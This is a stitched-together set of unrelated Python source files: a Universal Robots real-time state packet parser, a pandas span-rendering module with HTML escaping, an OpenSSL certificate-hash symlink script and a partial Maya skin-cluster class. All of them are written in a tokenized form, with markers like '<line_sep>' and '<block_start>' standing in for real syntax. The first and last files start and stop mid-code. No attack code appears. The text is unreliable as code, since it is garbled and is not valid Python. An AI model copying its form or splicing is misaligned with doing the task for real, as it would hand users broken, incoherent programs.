all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_target=copy.deepcopy(all_values)<line_sep>#qdd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qdd_target=copy.deepcopy(all_values)<line_sep>#i_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_target=copy.deepcopy(all_values)<line_sep>#m_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.m_target=copy.deepcopy(all_values)<line_sep>#q_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_actual=copy.deepcopy(all_values)<line_sep>#qd_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_actual=copy.deepcopy(all_values)<line_sep>#i_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_actual=copy.deepcopy(all_values)<line_sep>### #tool_acc_values: 3x double (3x 8byte) all_values=list(struct.unpack_from("!ddd" buf offset))<line_sep>offset<augadd>3<times>8<line_sep>rs.tool_acc_values=copy.deepcopy(all_values)<line_sep>#unused: 15x double (15x 8byte) offset<augadd>120<line_sep>rs.unused=[]<line_sep>#tcp_force: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_force=copy.deepcopy(all_values)<line_sep>#tool_vector: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tool_vector=copy.deepcopy(all_values)<line_sep>#tcp_speed: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_speed=copy.deepcopy(all_values)<line_sep>#digital_input_bits: 1x double (1x 8byte) ? rs.digital_input_bits=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#motor_temperatures: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.motor_temperatures=copy.deepcopy(all_values)<line_sep>#controller_timer: 1x double (1x 8byte) rs.controller_timer=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#test_value: 1x double (1x 8byte) rs.test_value=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep><return>rs<block_end><block_end>#this parses RobotStateRT for versions <= v1.8 (i.e. 1.6, 1.7, 1.8) <class_stmt>RobotStateRT_V18(object)<block_start>__slots__=['time' 'q_target' 'qd_target' 'qdd_target' 'i_target' 'm_target' 'q_actual' 'qd_actual' 'i_actual' 'tool_acc_values' 'unused' 'tcp_force' 'tool_vector' 'tcp_speed' 'digital_input_bits' 'motor_temperatures' 'controller_timer' 'test_value' 'robot_mode' 'joint_modes']<line_sep>@staticmethod<def_stmt>unpack buf<block_start>offset=0<line_sep>message_size=struct.unpack_from("!i" buf offset)[0]<line_sep>offset<augadd>4<if_stmt>message_size<ne>len(buf)<block_start>print(("MessageSize: " message_size "; BufferSize: " len(buf)))<line_sep><raise>Exception("Could not unpack RobotStateRT packet: length field is incorrect")<block_end>rs=RobotStateRT_V18()<line_sep>#time: 1x double (1x 8byte) rs.time=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#q_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_target=copy.deepcopy(all_values)<line_sep>#qd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_target=copy.deepcopy(all_values)<line_sep>#qdd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qdd_target=copy.deepcopy(all_values)<line_sep>#i_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_target=copy.deepcopy(all_values)<line_sep>#m_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.m_target=copy.deepcopy(all_values)<line_sep>#q_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_actual=copy.deepcopy(all_values)<line_sep>#qd_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_actual=copy.deepcopy(all_values)<line_sep>#i_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_actual=copy.deepcopy(all_values)<line_sep>#tool_acc_values: 3x double (3x 8byte) all_values=list(struct.unpack_from("!ddd" buf offset))<line_sep>offset<augadd>3<times>8<line_sep>rs.tool_acc_values=copy.deepcopy(all_values)<line_sep>#unused: 15x double (15x 8byte) offset<augadd>120<line_sep>rs.unused=[]<line_sep>#tcp_force: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_force=copy.deepcopy(all_values)<line_sep>#tool_vector: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tool_vector=copy.deepcopy(all_values)<line_sep>#tcp_speed: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_speed=copy.deepcopy(all_values)<line_sep>#digital_input_bits: 1x double (1x 8byte) ? rs.digital_input_bits=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#motor_temperatures: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.motor_temperatures=copy.deepcopy(all_values)<line_sep>#controller_timer: 1x double (1x 8byte) rs.controller_timer=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#test_value: 1x double (1x 8byte) rs.test_value=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#robot_mode: 1x double (1x 8byte) rs.robot_mode=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#joint_mode: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.joint_modes=copy.deepcopy(all_values)<line_sep><return>rs<block_end><block_end>#this parses RobotStateRT for versions >=3.0 (i.e. 3.0) <class_stmt>RobotStateRT_V30(object)<block_start>__slots__=['time' 'q_target' 'qd_target' 'qdd_target' 'i_target' 'm_target' 'q_actual' 'qd_actual' 'i_actual' 'i_control' 'tool_vector_actual' 'tcp_speed_actual' 'tcp_force' 'tool_vector_target' 'tcp_speed_target' 'digital_input_bits' 'motor_temperatures' 'controller_timer' 'test_value' 'robot_mode' 'joint_modes' 'safety_mode' #6xd: unused 'tool_acc_values' #6xd: unused 'speed_scaling' 'linear_momentum_norm' #2xd: unused 'v_main' 'v_robot' 'i_robot' 'v_actual']<line_sep>@staticmethod<def_stmt>unpack buf<block_start>offset=0<line_sep>message_size=struct.unpack_from("!i" buf offset)[0]<line_sep>offset<augadd>4<if_stmt>message_size<ne>len(buf)<block_start>print(("MessageSize: " message_size "; BufferSize: " len(buf)))<line_sep><raise>Exception("Could not unpack RobotStateRT packet: length field is incorrect")<block_end>rs=RobotStateRT_V30()<line_sep>#time: 1x double (1x 8byte) rs.time=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#q_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_target=copy.deepcopy(all_values)<line_sep>#qd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_target=copy.deepcopy(all_values)<line_sep>#qdd_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qdd_target=copy.deepcopy(all_values)<line_sep>#i_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_target=copy.deepcopy(all_values)<line_sep>#m_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.m_target=copy.deepcopy(all_values)<line_sep>#q_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_actual=copy.deepcopy(all_values)<line_sep>#qd_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.qd_actual=copy.deepcopy(all_values)<line_sep>#i_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_actual=copy.deepcopy(all_values)<line_sep>#i_control: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.i_control=copy.deepcopy(all_values)<line_sep>#tool_vector_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tool_vector_actual=copy.deepcopy(all_values)<line_sep>#tcp_speed_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_speed_actual=copy.deepcopy(all_values)<line_sep>#tcp_force: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_force=copy.deepcopy(all_values)<line_sep>#tool_vector_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tool_vector_target=copy.deepcopy(all_values)<line_sep>#tcp_speed_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.tcp_speed_target=copy.deepcopy(all_values)<line_sep>#digital_input_bits: 1x double (1x 8byte) ? rs.digital_input_bits=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#motor_temperatures: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.motor_temperatures=copy.deepcopy(all_values)<line_sep>#controller_timer: 1x double (1x 8byte) rs.controller_timer=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#test_value: 1x double (1x 8byte) rs.test_value=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#robot_mode: 1x double (1x 8byte) rs.robot_mode=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#joint_modes: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.joint_modes=copy.deepcopy(all_values)<line_sep>#safety_mode: 1x double (1x 8byte) rs.safety_mode=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#unused: 6x double (6x 8byte) offset<augadd>48<line_sep>#tool_acc_values: 3x double (3x 8byte) all_values=list(struct.unpack_from("!ddd" buf offset))<line_sep>offset<augadd>3<times>8<line_sep>rs.tool_acc_values=copy.deepcopy(all_values)<line_sep>#unused: 6x double (6x 8byte) offset<augadd>48<line_sep>#speed_scaling: 1x double (1x 8byte) rs.speed_scaling=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#linear_momentum_norm: 1x double (1x 8byte) rs.linear_momentum_norm=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#unused: 2x double (2x 8byte) offset<augadd>16<line_sep>#v_main: 1x double (1x 8byte) rs.v_main=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#v_robot: 1x double (1x 8byte) rs.v_robot=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#i_robot: 1x double (1x 8byte) rs.i_robot=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#v_actual: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.v_actual=copy.deepcopy(all_values)<line_sep><return>rs<block_end><block_end>
# # Copyright (c) 2021 IBM Corp. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # # span.py # # Part of text_extensions_for_pandas # # Support for span-centric Jupyter rendering and utilities # <import_stmt>textwrap<import_from_stmt>typing *<import_from_stmt>enum Enum<import_stmt>text_extensions_for_pandas.resources<line_sep># TODO: This try/except block is for Python 3.6 support, and should be # reduced to just importing importlib.resources when 3.6 support is dropped. <try_stmt><block_start><import_stmt>importlib.resources<as>pkg_resources<block_end><except_stmt>ImportError<block_start><import_stmt>importlib_resources<as>pkg_resources<block_end># Limits the max number of displayed documents. Matches Pandas' default display.max_seq_items. _DOCUMENT_DISPLAY_LIMIT=100<class_stmt>SetType(Enum)<block_start>NESTED=1<line_sep>OVERLAP=2<block_end><class_stmt>RegionType(Enum)<block_start>NESTED=1<line_sep>COMPLEX=2<line_sep>SOLO=3<block_end><def_stmt>pretty_print_html column:Union["SpanArray" "TokenSpanArray"] show_offsets:bool<arrow>str<block_start>""" HTML pretty-printing of a series of spans for Jupyter notebooks. Args: column: Span column (either character or token spans). show_offsets: True to generate a table of span offsets in addition to the marked-up text """<line_sep># Local import to prevent circular dependencies <import_from_stmt>text_extensions_for_pandas.array.span SpanArray<import_from_stmt>text_extensions_for_pandas.array.token_span TokenSpanArray<if_stmt><not>isinstance(column (SpanArray TokenSpanArray))<block_start><raise>TypeError(f"Expected SpanArray or TokenSpanArray, but received "<concat>f"{column} of type {type(column)}")<block_end># Gets the main script and stylesheet from the 'resources' sub-package style_text:str=pkg_resources.read_text(text_extensions_for_pandas.resources "span_array.css")<line_sep>script_text:str=pkg_resources.read_text(text_extensions_for_pandas.resources "span_array.js")<line_sep># Declare initial variables common to all render calls instance_init_script_list:List[str]=[]<line_sep># For each document, pass the array of spans and document text into the script's render function document_columns=column.split_by_document()<for_stmt>column_index range(min(_DOCUMENT_DISPLAY_LIMIT len(document_columns)))# Get a javascript representation of the column <block_start>span_array=[]<line_sep>token_span_array=[]<for_stmt>e document_columns[column_index]<block_start>span_array.append(f"""[{e.begin},{e.end}]""")<if_stmt>hasattr(e "tokens")<block_start>token_span_array.append(f"""[{e.begin_token},{e.end_token}]""")<block_end><block_end>document_object_script=f""" const doc_spans = [{','.join(span_array)}] const doc_text = '{_get_escaped_doctext(document_columns[column_index])}' """<line_sep># If the documents are a TokenSpanArray, include the start and end token indices in the document object. <if_stmt>len(token_span_array)<g>0<block_start>document_object_script<augadd>f""" const doc_token_spans = [{','.join(token_span_array)}] documents.push({{doc_text: doc_text, doc_spans: doc_spans, doc_token_spans: doc_token_spans}}) """<block_end><else_stmt><block_start>document_object_script<augadd>""" documents.push({doc_text: doc_text, doc_spans: doc_spans}) """<block_end>instance_init_script_list.append(f""" {{ {document_object_script} }} """)<block_end># Defines a list of DOM strings to be appended to the end of the returned HTML. postfix_tags:List[str]=[]<if_stmt>len(document_columns)<g>_DOCUMENT_DISPLAY_LIMIT<block_start>postfix_tags.append(f""" <footer>Documents truncated. Showing {_DOCUMENT_DISPLAY_LIMIT} of {len(document_columns)}</footer> """)<block_end># Get the show_offsets parameter as a JavaScript boolean show_offset_string='true'<if>show_offsets<else>'false'<line_sep><return>textwrap.dedent(f""" <style class="span-array-css"> {textwrap.indent(style_text ' ')} </style> <script> {{ {textwrap.indent(script_text ' ')} }} </script> <div class="span-array"> {_get_initial_static_html(column show_offsets)} <span style="font-size: 0.8em;color: #b3b3b3;">Your notebook viewer does not support Javascript execution. The above rendering will not be interactive.</span> </div> <script> {{ const Span = window.SpanArray.Span const script_context = document.currentScript const documents = [] {''.join(instance_init_script_list)} const instance = new window.SpanArray.SpanArray(documents, {show_offset_string}, script_context) instance.render() }} </script> {''.join(postfix_tags)} """)<block_end><def_stmt>_get_escaped_doctext column:Union["SpanArray" "TokenSpanArray"]<arrow>List[str]# Subroutine of pretty_print_html() above. # Should only be called for single-document span arrays. <block_start><if_stmt><not>column.is_single_document<block_start><raise>ValueError("Array contains spans from multiple documents. Can only "<concat>"render one document at a time.")<block_end>text=column.document_text<line_sep>text_pieces=[]<for_stmt>i range(len(text))<block_start><if_stmt>text[i]<eq>"'"<block_start>text_pieces.append("\\'")<block_end><elif_stmt>text[i]<eq>"\n"<block_start>text_pieces.append("\\n")<block_end><else_stmt><block_start>text_pieces.append(text[i])<block_end><block_end><return>"".join(text_pieces)<block_end><def_stmt>_get_initial_static_html column:Union["SpanArray" "TokenSpanArray"] show_offsets:bool<arrow>str# Subroutine of pretty_print_html above. # Gets the initial static html representation of the column for notebook viewers without JavaScript support. # Iterates over each document and constructs the DOM string with template literals. # ! Text inserted into the DOM as raw HTML should always be sanitized to prevent unintended DOM manipulation # and XSS attacks. <block_start>documents=column.split_by_document()<line_sep>documents_html=[]<for_stmt>column_index range(min(_DOCUMENT_DISPLAY_LIMIT len(documents)))<block_start>document=documents[column_index]<line_sep># Generate a dictionary to store span information, including relationships with spans occupying the same region. spans={}<line_sep>is_token_document=<false><line_sep>sorted_span_ids=[]<for_stmt>i range(len(document))<block_start>span_data={}<line_sep>span_data["id"]=i<line_sep>span_data["begin"]=document[i].begin<line_sep>span_data["end"]=document[i].end<if_stmt>hasattr(document[i] "tokens")<block_start>is_token_document=<true><line_sep>span_data["begin_token"]=document[i].begin_token<line_sep>span_data["end_token"]=document[i].end_token<block_end>span_data["sets"]=[]<line_sep>spans[i]=span_data<line_sep>sorted_span_ids.append(i)<block_end># Sort IDs sorted_span_ids.sort(key=<lambda>id:(spans[id]["begin"] -spans[id]["end"]))<for_stmt>i range(len(sorted_span_ids))<block_start>span_data=spans[sorted_span_ids[i]]<for_stmt>j range(i+1 len(sorted_span_ids))<block_start>sub_span_data=spans[sorted_span_ids[j]]<line_sep># If the spans do not overlap, exit the sub-loop <if_stmt>(sub_span_data["begin"]<ge>span_data["end"])<block_start><break><block_end><else_stmt><block_start><if_stmt>(sub_span_data["end"]<le>span_data["end"])<block_start>span_data["sets"].append({"type":SetType.NESTED "id":sub_span_data["id"]})<block_end><else_stmt><block_start>span_data["sets"].append({"type":SetType.OVERLAP "id":sub_span_data["id"]})<block_end><block_end><block_end>spans[sorted_span_ids[i]]=span_data<block_end># Generate the table rows DOM string from span data. table_rows_html=[]<for_stmt>i range(len(spans))<block_start>span=spans[i]<line_sep>table_rows_html.append(f""" <tr> <td><b>{span["id"]}</b></td> <td>{span["begin"]}</td> <td>{span["end"]}</td> """)<if_stmt>is_token_document<block_start>table_rows_html.append(f""" <td>{span["begin_token"]}</td> <td>{span["end_token"]}</td> """)<block_end>table_rows_html.append(f""" <td>{_get_sanitized_text(document.document_text[span["begin"]:span["end"]])}</td> </tr> """)<block_end># Generate the regions of the document_text to highlight from span data. mark_regions=[]<line_sep>i=0<while_stmt>i<l>len(document)<block_start>region={}<line_sep>region["root_id"]=i<line_sep>region["begin"]=spans[i]["begin"]<line_sep>set_span=_get_set_span(spans i)<line_sep>region["end"]=set_span["end"]<if_stmt>len(spans[i]["sets"])<g>0# get set span and type <block_start><if_stmt>(_is_complex(spans i))<block_start>region["type"]=RegionType.COMPLEX<block_end><else_stmt><block_start>region["type"]=RegionType.NESTED<block_end><block_end><else_stmt><block_start>region["type"]=RegionType.SOLO<block_end>mark_regions.append(region)<line_sep>i=set_span["highest_id"]+1<block_end># Generate the document_text DOM string from the regions created above. context_html=[]<if_stmt>len(mark_regions)<eq>0# There are no marked regions. Just append the sanitized text as a raw string. <block_start>context_html.append(_get_sanitized_text(document.document_text))<block_end><else_stmt># Iterate over each marked region and contruct the HTML for preceding text and marked text. # Then, append that HTML to the list of DOM strings for the document_text. <block_start>snippet_begin=0<for_stmt>region mark_regions<block_start>context_html.append(f""" {_get_sanitized_text(document.document_text[snippet_begin:region["begin"]])} """)<if_stmt>region["type"]<eq>RegionType.COMPLEX<block_start>context_html.append(f""" <span class='mark btn-info complex-set' style=' padding:0.4em; border-radius:0.35em; background:linear-gradient(to right, #a0c4ff, #ffadad); color: black; '>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])} <span class='mark-tag' style=' font-weight: bolder; font-size: 0.8em; font-variant: small-caps; font-variant-caps: small-caps; font-variant-caps: all-small-caps; margin-left: 8px; text-transform: uppercase; color: black; '>Set</span> </span> """)<block_end><elif_stmt>region["type"]<eq>RegionType.NESTED<block_start>mark_html=[]<line_sep>nested_snippet_begin=region["begin"]<line_sep># Iterate over each span nested within the root span of the marked region <for_stmt>nested_span map(<lambda>set:spans[set["id"]] spans[region["root_id"]]["sets"])<block_start>mark_html.append(f""" {_get_sanitized_text(document.document_text[nested_snippet_begin:nested_span["begin"]])} <span class='mark btn-warning' style=' padding:0.2em 0.4em; border-radius:0.35em; background-color: #ffadad; color: black; '>{_get_sanitized_text(document.document_text[nested_span["begin"]:nested_span["end"]])}</span> """)<line_sep>nested_snippet_begin=nested_span["end"]<block_end>mark_html.append(_get_sanitized_text(document.document_text[nested_snippet_begin:region["end"]]))<line_sep>context_html.append(f""" <span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{"".join(mark_html)}</span> """)<block_end><elif_stmt>region["type"]<eq>RegionType.SOLO<block_start>context_html.append(f""" <span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}</span> """)<block_end>snippet_begin=region["end"]<block_end>context_html.append(_get_sanitized_text(document.document_text[snippet_begin:]))<block_end># Generate the document's DOM string documents_html.append(f""" <div class='document'> <table style=' table-layout: auto; overflow: hidden; width: 100%; border-collapse: collapse; '> <thead style='font-variant-caps: all-petite-caps;'> <th></th> <th>begin</th> <th>end</th> {"<th>begin token</th><th>end token</th>"<if>is_token_document<else>""} <th style='text-align:right;width:100%'>context</th> </tr></thead> <tbody> {"".join(table_rows_html)} </tbody> </table> <p style=' padding: 1em; line-height: calc(var(--jp-content-line-height, 1.6) * 1.6); '> {"".join(context_html)} </p> </div> """)<block_end># Concat all documents and return the final DOM string <return>"".join(documents_html)<block_end><def_stmt>_get_set_span spans:Dict id:int<arrow>Dict# Subroutine of _get_initial_static_html() above. # Recursive algorithm to get the last end and ID values of the set of spans connected to span with the given ID # Will raise a KeyError exception if an invalid key is given <block_start>end=spans[id]["end"]<line_sep>highest_id=id<line_sep># For each span in the set of spans, get the return values and track the greatest endpoint index and ID values. <for_stmt>set spans[id]["sets"]<block_start>other=_get_set_span(spans set["id"])<if_stmt>other["end"]<g>end<block_start>end=other["end"]<block_end><if_stmt>other["highest_id"]<g>highest_id<block_start>highest_id=other["highest_id"]<block_end><block_end><return>{"end":end "highest_id":highest_id}<block_end><def_stmt>_is_complex spans:Dict id:int<arrow>bool# Subroutine of _get_initial_static_html() above. # Returns True if the provided span should be considered a "Complex" span. Implementation details below. # Will raise a KeyError exception if an invalid key is given # If any connection sets are of type:overlap or nested beyond a depth of 1, return True <block_start><for_stmt>set spans[id]["sets"]<block_start><if_stmt>set["type"]<eq>SetType.OVERLAP<block_start><return><true><block_end><elif_stmt>set["type"]<eq>SetType.NESTED<block_start><if_stmt>len(spans[set["id"]]["sets"])<g>0<block_start><return><true><block_end><block_end><block_end><return><false><block_end><def_stmt>_get_sanitized_text text:str<arrow>str# Subroutine of _get_initial_static_html() above. # Returns a string with HTML reserved character replacements to avoid issues while rendering text as HTML <block_start>text_pieces=[]<for_stmt>i range(len(text))<block_start><if_stmt>text[i]<eq>"&"<block_start>text_pieces.append("&amp;")<block_end><elif_stmt>text[i]<eq>"<"<block_start>text_pieces.append("&lt;")<block_end><elif_stmt>text[i]<eq>">"<block_start>text_pieces.append("&gt;")<block_end><elif_stmt>text[i]<eq>"\""# Not strictly necessary, but just in case. <block_start>text_pieces.append("&quot;")<block_end><elif_stmt>text[i]<eq>"'"# Not strictly necessary, but just in case. <block_start>text_pieces.append("&#39;")<block_end><elif_stmt>text[i]<eq>"$"# Dollar sign messes up Jupyter's JavaScript UI. # Place dollar sign in its own sub-span to avoid being misinterpeted as a LaTeX delimiter <block_start>text_pieces.append("<span>&#36;</span>")<block_end><elif_stmt>text[i]<eq>"\n"<or>text[i]<eq>"\r"# Support for in-document newlines by replacing with line break elements <block_start>text_pieces.append("<br>")<block_end><else_stmt><block_start>text_pieces.append(text[i])<block_end><block_end><return>"".join(text_pieces)<block_end>
<import_stmt>os<import_stmt>os.path<import_stmt>subprocess<import_stmt>sys<if_stmt>__name__<eq>"__main__"<block_start>dirname=sys.argv[1]<for_stmt>x os.listdir(dirname)<block_start><if_stmt>x.endswith('.crt')<block_start><try_stmt><block_start>filename=os.path.join(dirname x)<line_sep>filehash=subprocess.check_output(['openssl' 'x509' '-noout' '-hash' '-in' filename]).strip()<line_sep>filehash<augadd>'.0'<line_sep>hash_filename=os.path.join(dirname filehash)<if_stmt>os.path.exists(hash_filename)<block_start>print(x filehash)<line_sep>os.remove(hash_filename)<block_end>os.symlink(x hash_filename)<block_end><except_stmt><block_start>print("error in handling file:" filename)<block_end><block_end><block_end><block_end>
__author__="<NAME>"<line_sep>__contact__="<EMAIL>"<line_sep>__website__="http://riggingtd.com"<import_stmt>maya.cmds<as>cmds<import_stmt>maya.OpenMaya<as>om<import_stmt>maya.OpenMayaAnim<as>oma<import_from_stmt>DLS.core utils<class_stmt>FnSkinCluster(object)<block_start><def_stmt>__init__ self skinCluster=<none><block_start>""" Args: skinCluster (str, Optional): Defaults to None """<line_sep>self.skinCluster=skinCluster<if_stmt>skinCluster<block_start>self.fn=oma.MFnSkinCluster(utils.getDependNode(skinCluster))<block_end><block_end><def_stmt>setSkinCluster self skinCluster<block_start>""" Args: skinCluster (str, Optional): Defaults to None Returns: SkinClusterFn """<line_sep>self.skinCluster=skinCluster<line_sep>self.fn=oma.MFnSkinCluster(utils.getDependNode(skinCluster))<line_sep><return>self<block_end><def_stmt>getLogicalInfluenceIndex self influence<block_start>""" Args: influence (str) Returns: int """<try_stmt><block_start>dagPath=utils.getDagPath(influence)<block_end><except_stmt><block_start><raise>utils.UserInputError("Could not find influence '%s' in %s"%(influence self.skinCluster))<block_end><return>self.fn.indexForInfluenceObject(dagPath)<block_end>#---------------------------------------------------------------------- <def_stmt>getPhysicalInfluenceIndex self influence<block_start>""" Args: influence (str) Returns: int """<line_sep>matrices=cmds.listConnections("%s.matrix"%self.skinCluster s=1 d=0)<line_sep><return>matrices.index(influence)<block_end>#---------------------------------------------------------------------- <def_stmt>getInfluenceData self influence<block_start>""" Args: influence (str) Returns: WeightData """<try_stmt><block_start>dagPath=utils.getDagPath(influence)<block_end><except_stmt><block_start><raise>utils.UserInputError("Could not find influence '%s' in %s"%(influence self.skinCluster))<block_end>selList=om.MSelectionList()<line_sep>weights=om.MDoubleArray()<line_sep>self.fn.getPointsAffectedByInfluence(dagPath selList weights)<line_sep>componentStr=[]<line_sep>selList.getSelectionStrings(componentStr)<line_sep>componentStr=cmds.ls(componentStr ap=1 fl=1)<line_sep>weights=[w<for>w weights]<line_sep><return>WeightData(componentStr weights)<block_end>#---------------------------------------------------------------------- <def_stmt>listInfluences self asDagPath=<true><block_start>""" Returns: list """<line_sep>dagPaths=om.MDagPathArray()<line_sep>self.fn.influenceObjects(dagPaths)<if_stmt>asDagPath<block_start><return>dagPaths<block_end><else_stmt><block_start><return>[dagPaths[i].partialPathName()<for>i xrange(dagPaths.length())]<block_end><block_end>#---------------------------------------------------------------------- <def_stmt>getWeightData self elements<block_start>""" Args: elements (list) Returns: SkinWeightData """<line_sep>dagPath,components=utils.getDagPathComponents(elements)<line_sep># Get all influences infs=self.listInfluences(asDagPath=<false>)<line_sep>influenceIndices=om.MIntArray()<line_sep>[influenceIndices.append(self.getPhysicalInfluenceIndex(inf))<for>inf infs]<line_sep># Get all weights weights=om.MDoubleArray()<line_sep>self.fn.getWeights(dagPath components influenceIndices weights)<line_sep>weights=[w<for>w weights]<line_sep><return>SkinWeightData(elements infs weights)<block_end>#---------------------------------------------------------------------- <def_stmt>setWeightData self data normalize=<true><block_start>""" Args: data (SkinWeightData) normalize (bool, Optional): Defaults to True """<line_sep># Construct dagPath and components compList=data.getComponents()<line_sep>dagPath,components=utils.getDagPathComponents(compList)<line_sep># Construct influence indices 